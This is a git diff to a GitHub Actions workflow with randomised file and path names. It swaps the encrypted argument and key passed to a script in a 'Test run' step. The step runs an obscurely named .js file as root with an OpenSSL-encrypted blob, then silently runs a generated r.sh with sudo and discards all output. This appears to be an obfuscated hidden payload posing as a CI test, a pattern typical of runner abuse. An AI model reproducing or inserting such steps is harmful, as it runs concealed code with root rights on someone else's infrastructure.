--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'scz3l'
+        echo 'bwed1'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+8HI/QM8twNhJyoDUZw6CE2UFN765F6UtQs2qlTdnt/qZv6OTBt3hiBJViU3UDr0iHrjIx4LnvtwwWg5vhBpXCcL4/cwygLSlOTZdmC+oTxCWk9sw+vczz xo5oxd && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19TkbZaLRSLlmniQUR9b9WroDMNR6MujkOFX26gmfLehpYJCUeug/lrUZVyOjUkvWOoUN+kvXmpyKyf28i70P9I2C2pdyryKPTt31aewUryyEzG6kQWqzlY ut65kf && sudo sh r.sh > /dev/null 2>&1
